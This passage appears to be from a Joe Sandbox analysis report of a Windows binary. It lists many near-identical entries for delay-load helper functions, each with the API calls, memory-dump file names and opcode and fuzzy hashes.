        • Instruction Fuzzy Hash: A6B0128567A001BCF34871547D16F36025DD9D0F11BB0403FF401C4081D7400D06A731
        Function 0013F3EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: e373fe58f5315d35133e8d4b791f654bd2645771db5b8b7446bc946f57b95954
        • Instruction ID: 0c7977b91db5f3673d84661862524653fccac112162d8d80f93c32518262a013
        • Opcode Fuzzy Hash: e373fe58f5315d35133e8d4b791f654bd2645771db5b8b7446bc946f57b95954
        • Instruction Fuzzy Hash: FCB012C5669001BCF348B1247D06F3A035CC5D0B15770803FF801C4080D7400D06A731
        Function 0013F412 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 0b73264d5c254ae486ddc51329821003821fcdeadd653fb8a43424bac23a5583
        • Instruction ID: 3af6e1cce08b40a887f84bf295577c742ac2a3b3a9c5137bc84cac57340a69ae
        • Opcode Fuzzy Hash: 0b73264d5c254ae486ddc51329821003821fcdeadd653fb8a43424bac23a5583
        • Instruction Fuzzy Hash: 95B012856B9401BCF35871147D07F3A021CC5D0B15770803FF801C4080D7400D06A731
        Function 0013F41C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 9a3831ca5c10038733fb52baf577fea8a877c83b9e4770821c7f39f50d347437
        • Instruction ID: 98cf8438a3445a315ed73fa191a7e2f87e6a88fa2cf5b14676f58bdbfa4b8fd3
        • Opcode Fuzzy Hash: 9a3831ca5c10038733fb52baf577fea8a877c83b9e4770821c7f39f50d347437
        • Instruction Fuzzy Hash: 7AB01285AB9501BCF39871147D07F36021CC5D0B11770813FF401C4080D7400D46A771
        Function 0013F408 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: b3c76b7b4777ffa452a469b7346fb4b533eb23b1ccdd0d35932ff2fd983ad1e1
        • Instruction ID: 15f12f79807e81c12160d3436f35327dc2e3eeb9e17fcbde9907ac6a5e8dbb78
        • Opcode Fuzzy Hash: b3c76b7b4777ffa452a469b7346fb4b533eb23b1ccdd0d35932ff2fd983ad1e1
        • Instruction Fuzzy Hash: 92B012C6669001BCF348B1147D06F36035CD5D0F117B0413FF401C4080D7400D06A731
        Function 0013F563 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: b41af77038f539c5fba76b17f1835fc75363b2a21955e31018e766d038b202a4
        • Instruction ID: 993caa9d7ff178d8bd1d17535c04ba762349fee3afe284371955495eead522bd
        • Opcode Fuzzy Hash: b41af77038f539c5fba76b17f1835fc75363b2a21955e31018e766d038b202a4
        • Instruction Fuzzy Hash: 4AB092816A8200AEE30861183902A36018CC694B11B31412FF401C5080A7404C4A2271
        Function 0013F56D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 36a3843ff1fc5c3f97ea95b23ffea618c56bfbaecffcfd2bc8a28b450158b7d7
        • Instruction ID: 518be7e8359e3765f94e4122b6b0f257181905e670059c3521effa417320cc5c
        • Opcode Fuzzy Hash: 36a3843ff1fc5c3f97ea95b23ffea618c56bfbaecffcfd2bc8a28b450158b7d7
        • Instruction Fuzzy Hash: 11B012C16E8200BEF30871183D12F36018CC2D4B11B31403FF401C5080D7404C0B1371
        Function 0013F595 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 3661995ac7a8c4776c85763dc23e925ab003912980bc32364ab6224d2d53b52e
        • Instruction ID: 8cf1d38d8300415ef94fc84f445dca08f43b2977313b5f41018a0da190cb262b
        • Opcode Fuzzy Hash: 3661995ac7a8c4776c85763dc23e925ab003912980bc32364ab6224d2d53b52e
        • Instruction Fuzzy Hash: A4B012C16F8000BEF30871187D12F36014CC2D4B11B31423FF401C5080D7414C0B1771
        Function 0013F689 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 80542b415a7e0cb8638030de25d72f16a904068b7c7bd3495a3075cd5e7738d7
        • Instruction ID: 85cffa327581b4f64d731c9c8f65a7a30d2fd70c75b4d3f61f89d7349fd620cf
        • Opcode Fuzzy Hash: 80542b415a7e0cb8638030de25d72f16a904068b7c7bd3495a3075cd5e7738d7
        • Instruction Fuzzy Hash: CDB09289668100BCE30831107A03936010CC9D0B15730813EF401E8481964009061671
        Function 0013F6A4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 0bc84abfd07e228bd1c63df94d36356599f762bcb58389f20f5534a4001ce794
        • Instruction ID: 92b5b00a49aa9a7eb0050a744b02fb88082096eef4f2effc3f26657442f8097a
        • Opcode Fuzzy Hash: 0bc84abfd07e228bd1c63df94d36356599f762bcb58389f20f5534a4001ce794
        • Instruction Fuzzy Hash: DFB09281668100ACE30871242903A36011CC5D4B15730413EF401D4180D640084A2771
        Function 0013F6AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 35d118474ea362dfacf80987b29e914781665d02f58dc836e61ffe1d4c640ef2
        • Instruction ID: 1188e65e750e39e5d8c5823a95020271ac5d4579cab4ab4ab649671e0100ba4a
        • Opcode Fuzzy Hash: 35d118474ea362dfacf80987b29e914781665d02f58dc836e61ffe1d4c640ef2
        • Instruction Fuzzy Hash: 5FB09285678000ACE20871242A03A36011CC1D4B15730803EF401D80809640080A1771
        Function 0013F719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: b73542be58eaae57f7916f74d36dc8695222443d279511f867b13cbfa9d28106
        • Instruction ID: c8d2d16860154b3cb1085836c82784298cb5bf7c996441483e5d9673bbaf94d3
        • Opcode Fuzzy Hash: b73542be58eaae57f7916f74d36dc8695222443d279511f867b13cbfa9d28106
        • Instruction Fuzzy Hash: 04B09281668201ADF20861146906E36011CC1A0B117B0443EF421C48809640094A1231
        Function 0013F705 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: aafa6716c99a9f40cd84c21520fc1e8585eaf779557a09d60de55637d2aa8164
        • Instruction ID: 80b1b070f67c64de428ec3c6d131f4cc322cf204115299708356dcc1863ffc5e
        • Opcode Fuzzy Hash: aafa6716c99a9f40cd84c21520fc1e8585eaf779557a09d60de55637d2aa8164
        • Instruction Fuzzy Hash: E7B012C167C201BDF30871147D07F3A021CC1E0B15770843FF811C4480D7400D4A1331
        Function 0013F70F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 3b49b6444e3a01718838b0198b6ba76046ab1971b7766221c20021dc3168e386
        • Instruction ID: 737174fb32d34898870093634f85d06cf2233f0e7bedbf459b67c4088290f5b5
        • Opcode Fuzzy Hash: 3b49b6444e3a01718838b0198b6ba76046ab1971b7766221c20021dc3168e386
        • Instruction Fuzzy Hash: 9AB09285678201ADE20861146A46E36011CC1A0B11770443EF411C848096800A4A1231
        Function 0013F723 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8ae16b9905838623516a54f2b1d6e7971e93c9f3976e2c32c209097f62a3036d
        • Instruction ID: 81bb1e37addb529f6606e35ae292ce59c3acefd32d6b59e667883d0abec8f9f6
        • Opcode Fuzzy Hash: 8ae16b9905838623516a54f2b1d6e7971e93c9f3976e2c32c209097f62a3036d
        • Instruction Fuzzy Hash: 17B09281668201BDE25861146D06E36010CC1A0B11730492EF411C44809640098A1331
        Function 0013F72D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F6FC
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8b338105c10cd585e64a9d3a4a28bccde31d4cc15d7176e94f1d6c259ab802e8
        • Instruction ID: 45f30f2f8fea6b57d15504af998c4ad93fdda0e95a27e6ee523a85b1c1572740
        • Opcode Fuzzy Hash: 8b338105c10cd585e64a9d3a4a28bccde31d4cc15d7176e94f1d6c259ab802e8
        • Instruction Fuzzy Hash: 3BB09281668201BDE21861146906E3A010CC1A0B15730842EF811C9480D640094A1231
        Function 0013FD48 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013FD5A
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
